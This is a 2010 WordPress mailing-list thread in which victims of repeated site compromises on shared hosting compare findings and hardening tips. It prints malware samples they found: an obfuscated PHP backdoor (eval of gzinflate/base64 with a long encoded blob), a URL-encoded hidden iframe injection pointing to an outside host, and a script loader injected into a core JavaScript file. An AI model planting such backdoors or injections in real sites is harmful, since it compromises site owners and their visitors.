[wp-hackers] wordpress theme script injection (hosted on dreamhost)
Edward de Leau
e at leau.net
Sun Oct 31 19:18:51 UTC 2010
There is one advantage to use Mediatemple though... when you go to their
Grid usage screen you see all scripts/pages by usage. So as soon as you a
weird script in there being called a lot of times (so at the top)... you
know enough.
On Sun, Oct 31, 2010 at 8:16 PM, Edward de Leau <e at leau.net> wrote:
> Switching hosts does not matter, the same happened to me on mediatemple
> recently.
>
> The caller script was inserted at the top of
> wp-includes/js/jquery/ui.tabs.js
>
> containing the caller:
>
> document.write(‘<script type="text/javascript"
> src="/images/some_image/jquery.cycle.all.min.php"><\/script>’);/*
>
> so the script itself, looking the same as yours in content was placed in
> the /images/some_image directory.
>
> I also still don't know how it was placed there. I have moved the wp.config
> a level out of the webroot, have locks on the thing, other database
> prefixes, secured my .htaccess, have a 400 on the wp-config, I think I have
> chmodded all
> of this to the amount that users still can see things so... possibly via
> another application that runs under my shared hosting account (i think).
>
>
>
>
>
>
>
>
> On Sun, Oct 31, 2010 at 7:51 PM, Mladen Adamovic <
> mladen.adamovic at gmail.com> wrote:
>
>> The website was hacked multiple times. While I was trying to prevent it
>> happen again :
>> - I did upgrade to latest version
>> - changed passwords
>> - made fresh wordpress install, imported RSS feed of old instance
>> and disabled all plugins I don't use.
>>
>> ..and it was hacked again.
>>
>> I did now checked access.logs files with grep and all what I could find
>> suspicious is :
>>
>> access.log:69.163.128.12 - - [31/Oct/2010:03:05:04 -0700] "POST
>> /wp-cron.php?doing_wp_cron HTTP/1.0" 200 184 "-" "WordPress/3.0.1; "
>>
>> access.log.2010-10-29:64.0.55.44 - - [29/Oct/2010:13:39:27 -0700] "POST
>> /wp-admin/includes/planb.php HTTP/1.1" 200 8194 "
>> http://blog.numbeo.com/wp-admin/includes/planb.php" "Mozilla/5.0
>> (Windows;
>> U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026
>> AskTbSPC2/3.8.0.12304
>> Firefox/3.6.12 WebMoney Advisor"
>>
>> This planb.php looks fishy with it's content :
>> <?PHP
>> set_time_limit(0);
>> $login = "";
>> $pass = "";
>> $md5_pass = "";
>>
>> eval(gzinflate(base64_decode('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
>>
>>
>>
>> I did remove it. I did add security at wordpress.org to this thread.
>>
>> Comments appreciated.
>>
>>
>>
>>
>>
>>
>> On Sun, Oct 31, 2010 at 7:15 PM, Ozh <ozh at ozh.org> wrote:
>>
>> > Typically not a Dreamhost issue, otherwise there would be *thousands*
>> > of people screaming, and me in first line
>> >
>> > Being up to date with WP is fine, but most hack on shared hosting are
>> > not done using WP
>> > - check file permissions <
>> http://codex.wordpress.org/Hardening_WordPress>
>> > - check other softwares & scripts running on your blog
>> > - change your main/SSH/FTP password
>> > - change your WP password
>> >
>> > I once had a WP blog hacked on Dreamhost. A few hours of investigation
>> > later (checking all the above + inspecting access logs) I found out
>> > that the insecure stuff was Scuttle (a delicious clone).
>> >
>> > On shared hosting WP is often the target, but rarely the entrance.
>> >
>> > On Sun, Oct 31, 2010 at 4:07 PM, Mladen Adamovic
>> > <mladen.adamovic at gmail.com> wrote:
>> > > Hi guys,
>> > >
>> > > My wordpress software instance was repeatedly hacked ... running
>> latest
>> > > Wordpress source code and being hosted on Dreamhost.
>> > >
>> > > I don't know which exploit it did use and couldn't identify it, but it
>> > was
>> > > adding the following code to my default theme footer.php:
>> > >
>> > > <script>
>> > > enc =
>> > >
>> >
>> "%3Ciframe%20width%3D1%20height%3D1%20border%3D0%20frameborder%3D0%20src%3D%27http%3A//
>> > > withthefirstgo.com/4/amyvaojujqinjpfqx.php%27%3E%3C/iframe%3E";
>> > > dec = unescape(enc);
>> > > document.write(dec);
>> > > </script>
>> > >
>> > > I think I'll have to migrate to Blogger, since I couldn't identify
>> > exploit
>> > > it did use.
>> > >
>> > > I wanted to drop you an email anyhow since identifying exploits is
>> > > important!
>> > > _______________________________________________
>> > > wp-hackers mailing list
>> > > wp-hackers at lists.automattic.com
>> > > http://lists.automattic.com/mailman/listinfo/wp-hackers
>> > >
>> >
>> >
>> >
>> > --
>> > http://ozh.org/
>> > _______________________________________________
>> > wp-hackers mailing list
>> > wp-hackers at lists.automattic.com
>> > http://lists.automattic.com/mailman/listinfo/wp-hackers
>> >
>> _______________________________________________
>> wp-hackers mailing list
>> wp-hackers at lists.automattic.com
>> http://lists.automattic.com/mailman/listinfo/wp-hackers
>>
>
>
More information about the wp-hackers
mailing list